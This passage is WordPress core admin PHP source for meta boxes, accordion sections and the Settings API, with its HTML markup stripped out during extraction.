    '; if ( $plugin ) { /* translators: %s: The name of the plugin that generated this meta box. */ printf( __( 'This meta box, from the %s plugin, is not compatible with the block editor.' ), "{$plugin['Name']}" ); } else { _e( 'This meta box is not compatible with the block editor.' ); } echo '

    '; if ( empty( $plugins['classic-editor/classic-editor.php'] ) ) { if ( current_user_can( 'install_plugins' ) ) { $install_url = wp_nonce_url( self_admin_url( 'plugin-install.php?tab=favorites&user=wordpressdotorg&save=0' ), 'save_wporg_username_' . get_current_user_id() ); echo '

    '; /* translators: %s: A link to install the Classic Editor plugin. */ printf( __( 'Please install the Classic Editor plugin to use this meta box.' ), esc_url( $install_url ) ); echo '

    '; } } elseif ( is_plugin_inactive( 'classic-editor/classic-editor.php' ) ) { if ( current_user_can( 'activate_plugins' ) ) { $activate_url = wp_nonce_url( self_admin_url( 'plugins.php?action=activate&plugin=classic-editor/classic-editor.php' ), 'activate-plugin_classic-editor/classic-editor.php' ); echo '

    '; /* translators: %s: A link to activate the Classic Editor plugin. */ printf( __( 'Please activate the Classic Editor plugin to use this meta box.' ), esc_url( $activate_url ) ); echo '

    '; } } elseif ( $data_object instanceof WP_Post ) { $edit_url = add_query_arg( array( 'classic-editor' => '', 'classic-editor__forget' => '', ), get_edit_post_link( $data_object ) ); echo '

    '; /* translators: %s: A link to use the Classic Editor plugin. */ printf( __( 'Please open the classic editor to use this meta box.' ), esc_url( $edit_url ) ); echo '

    '; } } /** * Internal helper function to find the plugin from a meta box callback. * * @since 5.0.0 * * @access private * * @param callable $callback The callback function to check. * @return array|null The plugin that the callback belongs to, or null if it doesn't belong to a plugin. */ function _get_plugin_from_callback( $callback ) { try { if ( is_array( $callback ) ) { $reflection = new ReflectionMethod( $callback[0], $callback[1] ); } elseif ( is_string( $callback ) && str_contains( $callback, '::' ) ) { $reflection = new ReflectionMethod( $callback ); } else { $reflection = new ReflectionFunction( $callback ); } } catch ( ReflectionException $exception ) { // We could not properly reflect on the callable, so we abort here. return null; } // Don't show an error if it's an internal PHP function. if ( ! $reflection->isInternal() ) { // Only show errors if the meta box was registered by a plugin. $filename = wp_normalize_path( $reflection->getFileName() ); $plugin_dir = wp_normalize_path( WP_PLUGIN_DIR ); if ( str_starts_with( $filename, $plugin_dir ) ) { $filename = str_replace( $plugin_dir, '', $filename ); $filename = preg_replace( '|^/([^/]*/).*$|', '\\1', $filename ); $plugins = get_plugins(); foreach ( $plugins as $name => $plugin ) { if ( str_starts_with( $name, $filename ) ) { return $plugin; } } } } return null; } /** * Meta-Box template function. * * @since 2.5.0 * * @global array $wp_meta_boxes Global meta box state. * * @param string|WP_Screen $screen The screen identifier. If you have used add_menu_page() or * add_submenu_page() to create a new screen (and hence screen_id) * make sure your menu slug conforms to the limits of sanitize_key() * otherwise the 'screen' menu may not correctly render on your page. * @param string $context The screen context for which to display meta boxes. * @param mixed $data_object Gets passed to the meta box callback function as the first parameter. * Often this is the object that's the focus of the current screen, * for example a `WP_Post` or `WP_Comment` object. * @return int Number of meta_boxes. */ function do_meta_boxes( $screen, $context, $data_object ) { global $wp_meta_boxes; static $already_sorted = false; if ( empty( $screen ) ) { $screen = get_current_screen(); } elseif ( is_string( $screen ) ) { $screen = convert_to_screen( $screen ); } $page = $screen->id; $hidden = get_hidden_meta_boxes( $screen ); printf( '
    ', esc_attr( $context ) ); /* * Grab the ones the user has manually sorted. * Pull them out of their previous context/priority and into the one the user chose. */ $sorted = get_user_option( "meta-box-order_$page" ); if ( ! $already_sorted && $sorted ) { foreach ( $sorted as $box_context => $ids ) { foreach ( explode( ',', $ids ) as $id ) { if ( $id && 'dashboard_browser_nag' !== $id ) { add_meta_box( $id, null, null, $screen, $box_context, 'sorted' ); } } } } $already_sorted = true; $i = 0; if ( isset( $wp_meta_boxes[ $page ][ $context ] ) ) { foreach ( array( 'high', 'sorted', 'core', 'default', 'low' ) as $priority ) { if ( isset( $wp_meta_boxes[ $page ][ $context ][ $priority ] ) ) { foreach ( (array) $wp_meta_boxes[ $page ][ $context ][ $priority ] as $box ) { if ( false === $box || ! $box['title'] ) { continue; } $block_compatible = true; if ( is_array( $box['args'] ) ) { // If a meta box is just here for back compat, don't show it in the block editor. if ( $screen->is_block_editor() && isset( $box['args']['__back_compat_meta_box'] ) && $box['args']['__back_compat_meta_box'] ) { continue; } if ( isset( $box['args']['__block_editor_compatible_meta_box'] ) ) { $block_compatible = (bool) $box['args']['__block_editor_compatible_meta_box']; unset( $box['args']['__block_editor_compatible_meta_box'] ); } // If the meta box is declared as incompatible with the block editor, override the callback function. if ( ! $block_compatible && $screen->is_block_editor() ) { $box['old_callback'] = $box['callback']; $box['callback'] = 'do_block_editor_incompatible_meta_box'; } if ( isset( $box['args']['__back_compat_meta_box'] ) ) { $block_compatible = $block_compatible || (bool) $box['args']['__back_compat_meta_box']; unset( $box['args']['__back_compat_meta_box'] ); } } ++$i; // get_hidden_meta_boxes() doesn't apply in the block editor. $hidden_class = ( ! $screen->is_block_editor() && in_array( $box['id'], $hidden, true ) ) ? ' hide-if-js' : ''; echo '
    ' . "\n"; echo '
    '; echo '

    '; if ( 'dashboard_php_nag' === $box['id'] ) { echo ''; echo '' . /* translators: Hidden accessibility text. */ __( 'Warning:' ) . ' '; } echo $box['title']; echo "

    \n"; if ( 'dashboard_browser_nag' !== $box['id'] ) { $widget_title = $box['title']; if ( is_array( $box['args'] ) && isset( $box['args']['__widget_basename'] ) ) { $widget_title = $box['args']['__widget_basename']; // Do not pass this parameter to the user callback function. unset( $box['args']['__widget_basename'] ); } echo '
    '; echo ''; echo ''; echo ''; echo ''; echo ''; echo '
    '; } echo '
    '; echo '
    ' . "\n"; if ( WP_DEBUG && ! $block_compatible && 'edit' === $screen->parent_base && ! $screen->is_block_editor() && ! isset( $_GET['meta-box-loader'] ) ) { $plugin = _get_plugin_from_callback( $box['callback'] ); if ( $plugin ) { $meta_box_not_compatible_message = sprintf( /* translators: %s: The name of the plugin that generated this meta box. */ __( 'This meta box, from the %s plugin, is not compatible with the block editor.' ), "{$plugin['Name']}" ); wp_admin_notice( $meta_box_not_compatible_message, array( 'additional_classes' => array( 'error', 'inline' ), ) ); } } call_user_func( $box['callback'], $data_object, $box ); echo "
    \n"; echo "
    \n"; } } } } echo '
    '; return $i; } /** * Removes a meta box from one or more screens. * * @since 2.6.0 * @since 4.4.0 The `$screen` parameter now accepts an array of screen IDs. * * @global array $wp_meta_boxes Global meta box state. * * @param string $id Meta box ID (used in the 'id' attribute for the meta box). * @param string|array|WP_Screen $screen The screen or screens on which the meta box is shown (such as a * post type, 'link', or 'comment'). Accepts a single screen ID, * WP_Screen object, or array of screen IDs. * @param string $context The context within the screen where the box is set to display. * Contexts vary from screen to screen. Post edit screen contexts * include 'normal', 'side', and 'advanced'. Comments screen contexts * include 'normal' and 'side'. Menus meta boxes (accordion sections) * all use the 'side' context. */ function remove_meta_box( $id, $screen, $context ) { global $wp_meta_boxes; if ( empty( $screen ) ) { $screen = get_current_screen(); } elseif ( is_string( $screen ) ) { $screen = convert_to_screen( $screen ); } elseif ( is_array( $screen ) ) { foreach ( $screen as $single_screen ) { remove_meta_box( $id, $single_screen, $context ); } } if ( ! isset( $screen->id ) ) { return; } $page = $screen->id; if ( ! isset( $wp_meta_boxes ) ) { $wp_meta_boxes = array(); } if ( ! isset( $wp_meta_boxes[ $page ] ) ) { $wp_meta_boxes[ $page ] = array(); } if ( ! isset( $wp_meta_boxes[ $page ][ $context ] ) ) { $wp_meta_boxes[ $page ][ $context ] = array(); } foreach ( array( 'high', 'core', 'default', 'low' ) as $priority ) { $wp_meta_boxes[ $page ][ $context ][ $priority ][ $id ] = false; } } /** * Meta Box Accordion Template Function. * * Largely made up of abstracted code from do_meta_boxes(), this * function serves to build meta boxes as list items for display as * a collapsible accordion. * * @since 3.6.0 * * @uses global $wp_meta_boxes Used to retrieve registered meta boxes. * * @param string|object $screen The screen identifier. * @param string $context The screen context for which to display accordion sections. * @param mixed $data_object Gets passed to the section callback function as the first parameter. * @return int Number of meta boxes as accordion sections. */ function do_accordion_sections( $screen, $context, $data_object ) { global $wp_meta_boxes; wp_enqueue_script( 'accordion' ); if ( empty( $screen ) ) { $screen = get_current_screen(); } elseif ( is_string( $screen ) ) { $screen = convert_to_screen( $screen ); } $page = $screen->id; $hidden = get_hidden_meta_boxes( $screen ); ?>

    $id, 'title' => $title, 'callback' => $callback, 'before_section' => '', 'after_section' => '', 'section_class' => '', ); $section = wp_parse_args( $args, $defaults ); if ( 'misc' === $page ) { _deprecated_argument( __FUNCTION__, '3.0.0', sprintf( /* translators: %s: misc */ __( 'The "%s" options group has been removed. Use another settings group.' ), 'misc' ) ); $page = 'general'; } if ( 'privacy' === $page ) { _deprecated_argument( __FUNCTION__, '3.5.0', sprintf( /* translators: %s: privacy */ __( 'The "%s" options group has been removed. Use another settings group.' ), 'privacy' ) ); $page = 'reading'; } $wp_settings_sections[ $page ][ $id ] = $section; } /** * Adds a new field to a section of a settings page. * * Part of the Settings API. Use this to define a settings field that will show * as part of a settings section inside a settings page. The fields are shown using * do_settings_fields() in do_settings_sections(). * * The $callback argument should be the name of a function that echoes out the * HTML input tags for this setting field. Use get_option() to retrieve existing * values to show. * * @since 2.7.0 * @since 4.2.0 The `$class` argument was added. * * @global array $wp_settings_fields Storage array of settings fields and info about their pages/sections. * * @param string $id Slug-name to identify the field. Used in the 'id' attribute of tags. * @param string $title Formatted title of the field. Shown as the label for the field * during output. * @param callable $callback Function that fills the field with the desired form inputs. The * function should echo its output. * @param string $page The slug-name of the settings page on which to show the section * (general, reading, writing, ...). * @param string $section Optional. The slug-name of the section of the settings page * in which to show the box. Default 'default'. * @param array $args { * Optional. Extra arguments that get passed to the callback function. * * @type string $label_for When supplied, the setting title will be wrapped * in a `